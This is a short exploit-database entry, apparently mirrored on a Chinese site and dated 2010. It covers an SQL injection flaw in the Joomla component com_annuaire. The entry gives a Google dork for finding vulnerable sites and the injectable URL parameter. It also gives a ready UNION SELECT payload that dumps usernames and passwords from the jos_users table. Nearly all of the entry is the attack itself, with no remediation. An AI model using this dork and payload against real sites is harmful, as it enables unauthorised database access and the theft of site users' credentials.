inurl:"index.php?option=com_annuaire"

  • 日期:2010-12-01
  • 类别:
  • 作者:anonymous
  • 语法:inurl:"index.php?option=com_annuaire"
  • SQL Injection Vulnerability:

    [+] vuln: http://127.0.0.1/index.php?option=com_annuaire&view=annuaire&type=cat&id=[SQLi]

    [+] Exploit: /**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users--

    Submitter: Ashiyane Digital Security Team